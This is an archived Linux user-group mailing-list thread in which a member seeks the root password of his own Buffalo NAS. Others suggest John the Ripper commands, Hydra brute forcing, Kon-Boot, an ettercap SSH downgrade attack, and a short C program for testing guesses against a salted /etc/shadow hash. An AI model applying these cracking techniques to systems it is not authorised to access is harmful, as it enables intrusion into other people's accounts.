On Fri, Jul 15, 2011 at 8:03 PM, Mark Phillips m...@phillipsmarketing.bizwrote: On Fri, Jul 15, 2011 at 7:27 PM, Lisa Kachold lisakach...@obnosis.comwrote: Mark, On Thu, Jul 14, 2011 at 6:56 PM, Mark Phillips m...@phillipsmarketing.biz wrote: Lisa, John the Ripper has been running for almost 2 days trying to crack the passwordstill no success. I think it's hung. Nope. the log file keeps spitting out what it is testing. I stopped it today and moved the process to another machine. You can see the results as reported in the log file at http://pastebin.com/pBZHfAS2 when I stopped the program . The other machine is slower (about 1.85 times slower, so it will take until Monday for it to catch upthe original machine was a x64, and the new machine is an i386, so I couldn't resume on the new machine). I will let you know if it finds the password after a week or two;-) What options did you pass it? None. Except that I used another program that came with john to join the passwd and shadow files into one file. John needed that. I can send you the passwd file if you are interested. Did you feed it a dictionary file? Just the one that came with john... It probably has a different encryption format than the linux john is on. What ports are open on the thing? SSH? You can try ettercap with arp spoof MITM? SSH seems to be open since it asks for a password. rsync and telnet are all that I know. There is a java hack program acp_commander.jar that will connect with telnet, but I do not get any response from the device, although it says it is connected. acp-commander.jar use to be the way in, but since firmware version 1.41, it has not worked. http://downloads.buffalo.nas-central.org/TOOLS/ALL_LS_KB_ARM9/ACP_COMMANDER/, http://buffalo.nas-central.org/index.php/Open_Stock_Firmware and my particular box. I have downloaded the firmware for the box and modified it to accept ssh login without a password (using ssh keys). I just have not been able to reflash the unit. The web interface only flashes what it downloads from buffalo.com. The windows program the box came with does not have a way to flash the unit. Embedded in the firmware download is a windows exe which is supposed to be a program to flash the unitjust haven't had the intestinal fortitude to try it out...I need to find the way back in case I brick the device, and I haven't had time to research that. Thanks for your interest! P.S. You have no idea how hard it is to not type dear john every time I refer to the program john the ripper.;-) anyway, back to TGIF time;-) Mark :) Mark On Jul 14, 2011 4:28 PM, Lisa Kachold lisakach...@obnosis.com wrote: If you don't have the ability to boot something like a DVD/CD or USB key, try john the ripper? Save the encrypted string to a test file and run it through john the ripper running on your system: Ubuntu: # apt-get install john Centos/RH/Fedora: # yum install john Example use: # john -single crackme.txt References: http://www.openwall.com/john/doc/ http://www.google.com/url?sa=tsource=videocd=1ved=0CDIQtwIwAAurl=http%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3D3YyscD_tADkrct=jq=john%20the%20rippertbm=videi=t3ofTsXRNqTv0gHB2bmYAwusg=AFQjCNE8vdlkxhwQ15zCuBePI9Y9qk3mAQcad=rja http://www.osix.net/modules/article/?id=455 On Thu, Jul 14, 2011 at 11:19 AM, Sam Kreimeyer skrei...@gmail.com wrote: Hello Mark, Have you tried using Kon-Boot? It's a bootable image that edits the kernel to bypass the password prompt. -- (602) 791-8002 Android (623) 239-3392 Skype (623) 688-3392 Google Voice ** Since this is a drive buffalo, I might try ettercap ssh downgrade attack: http://openmaniak.com/ettercap_filter.php ttp://sites.google.com/site/clickdeathsquad/Home/cds-ssh-mitmdowngrade Or Hydra: Hydra Instructions: http://www.youtube.com/watch?v=7CP-JB4QARo -- (602) 791-8002 Android (623) 239-3392 Skype (623) 688-3392 Google Voice ** HomeSmartInternational.com http://www.homesmartinternational.com --- PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us To subscribe, unsubscribe, or to change your mail settings: http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss --- PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us To subscribe, unsubscribe, or to change your mail settings: http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss -- (602) 791-8002 Android (623) 239-3392 Skype (623) 688-3392 Google Voice ** HomeSmartInternational.com http://www.homesmartinternational.com --- PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us To subscribe, unsubscribe, or to change your mail settings:
Re: Is it possible to extract the root password from the file system?
Since this is a drive buffalo, I might try ettercap ssh downgrade attack: http://openmaniak.com/ettercap_filter.php ttp://sites.google.com/site/clickdeathsquad/Home/cds-ssh-mitmdowngrade Not sure how a man in the middle attack will work, since I don't know the password to begin with... Or Hydra: Hydra Instructions: http://www.youtube.com/watch?v=7CP-JB4QARo Hydra is promising. I tried it with the common passwords list from openwall. No luck. Do you have any better password lists? Thanks, Mark --- PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us To subscribe, unsubscribe, or to change your mail settings: http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
Re: Is it possible to extract the root password from the file system?
Hello Mark, Have you tried using Kon-Boot? It's a bootable image that edits the kernel to bypass the password prompt. --- PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us To subscribe, unsubscribe, or to change your mail settings: http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
Re: Is it possible to extract the root password from the file system?
If you don't have the ability to boot something like a DVD/CD or USB key, try john the ripper? Save the encrypted string to a test file and run it through john the ripper running on your system: Ubuntu: # apt-get install john Centos/RH/Fedora: # yum install john Example use: # john -single crackme.txt References: http://www.openwall.com/john/doc/ http://www.google.com/url?sa=tsource=videocd=1ved=0CDIQtwIwAAurl=http%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3D3YyscD_tADkrct=jq=john%20the%20rippertbm=videi=t3ofTsXRNqTv0gHB2bmYAwusg=AFQjCNE8vdlkxhwQ15zCuBePI9Y9qk3mAQcad=rja http://www.osix.net/modules/article/?id=455 On Thu, Jul 14, 2011 at 11:19 AM, Sam Kreimeyer skrei...@gmail.com wrote: Hello Mark, Have you tried using Kon-Boot? It's a bootable image that edits the kernel to bypass the password prompt. -- (602) 791-8002 Android (623) 239-3392 Skype (623) 688-3392 Google Voice ** HomeSmartInternational.com http://www.homesmartinternational.com --- PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us To subscribe, unsubscribe, or to change your mail settings: http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
Re: Is it possible to extract the root password from the file system?
Lisa, John the Ripper has been running for almost 2 days trying to crack the passwordstill no success. :) Mark On Jul 14, 2011 4:28 PM, Lisa Kachold lisakach...@obnosis.com wrote: If you don't have the ability to boot something like a DVD/CD or USB key, try john the ripper? Save the encrypted string to a test file and run it through john the ripper running on your system: Ubuntu: # apt-get install john Centos/RH/Fedora: # yum install john Example use: # john -single crackme.txt References: http://www.openwall.com/john/doc/ http://www.google.com/url?sa=tsource=videocd=1ved=0CDIQtwIwAAurl=http%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3D3YyscD_tADkrct=jq=john%20the%20rippertbm=videi=t3ofTsXRNqTv0gHB2bmYAwusg=AFQjCNE8vdlkxhwQ15zCuBePI9Y9qk3mAQcad=rja http://www.osix.net/modules/article/?id=455 On Thu, Jul 14, 2011 at 11:19 AM, Sam Kreimeyer skrei...@gmail.com wrote: Hello Mark, Have you tried using Kon-Boot? It's a bootable image that edits the kernel to bypass the password prompt. -- (602) 791-8002 Android (623) 239-3392 Skype (623) 688-3392 Google Voice ** HomeSmartInternational.com http://www.homesmartinternational.com --- PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us To subscribe, unsubscribe, or to change your mail settings: http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
Re: Is it possible to extract the root password from the file system?
From: Mark Phillips m...@phillipsmarketing.biz
I was able to unzip the firmware to my laptop and it appears that
ssh root login is now enabled in the stock firmware. I confirmed
this by trying ssh to the machine.but, I need the root password
to login. How can I extract the root password from the file system
for the device?
I assume Linux/Linus has made it impossible to get at the root
password this way (e.g. from a copy of the file system)
Not impossible. Just annoyingly difficult. And there's got to be a better
way than that. But to get the password via brute-force, read on:
/etc/shadow should contain a line like:
root:$1$02PZeP4V$oh.for.hecks.sake:0:9:7:::
...Take a look at the second field. The part between the first and last $ is
the salt, and the rest is the crypted password. If the second field is empty,
then root's password is the empty string. If the second field contains *, !,
or x , then the crypt() function can't generate that string, and root can't
log in with a password. But then you could do something like
/* testcrypt.c
* gcc -o testcrypt testcrypt.c -lcrypt */
#define _XOPEN_SOURCE
#includestdio.h
#includeunistd.h
int main(int argc, char **argv)
{
char *salt=$1$02PZeP4V$; /* salt part of above string */
printf(%s crypted with %s is: %s\n,argv[1],salt,crypt(argv[1],salt));
return 0;
}
/* end C */
strncmp() the result of crypt() with the oh.for.hecks.sake portion of the
string from /etc/shadow , and if you get 0, you've got a password match.
You'd probably have to go through a very long list of strings before finding
the right one. There's no telling what they picked. I'd guess the password
would be somewhere in the manual or the docs, but ICBW.
You might be able to take the firmware's shadow file, replace the crypted
string for root with your own crypted string from your own Linux box's shadow
file, then pack up that firmware and install it on the device. Then you'd
know root's password.
--
Matt G / Dances With Crows
The Crow202 Blog: http://crow202.org/wordpress/
There is no Darkness in Eternity/But only Light too dim for us to see
---
PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us
To subscribe, unsubscribe, or to change your mail settings:
http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
Re: Is it possible to extract the root password from the file system?
There are password hacking tools out there you could run against the encrypted password that is stored in /etc/shadow but if there is a locked root account there may not be an encrypted password for root in that file and you will never be able to login. -- Steven DuChene -Original Message- From: Mark Phillips Sent: Jul 12, 2011 11:16 AM To: Phoenix Linux Users Subject: Is it possible to extract the root password from the file system? I have a new Buffalo LS-WXL NAS and I would like to root it. It has the newer firmware version, 1.43, and the instructions for rooting it ( http://buffalo.nas-central.org/wiki/Category:LS-WXL) have not caught up with the new firmware. However, I was able to unzip the firmware to my laptop and it appears that ssh root login is now enabled in the stock firmware. I confirmed this by trying ssh to the machine.but, I need the root password to login. How can I extract the root password from the file system for the device? I just have the file system unzipped on my hard drive, I don't have access to it running. I assume Linux/Linus has made it impossible to get at the root password this way (e.g. from a copy of the file system), but I thought I would ask anyway before I try to install some custom firmware on the NAS device. Thanks, Mark --- PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us To subscribe, unsubscribe, or to change your mail settings: http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
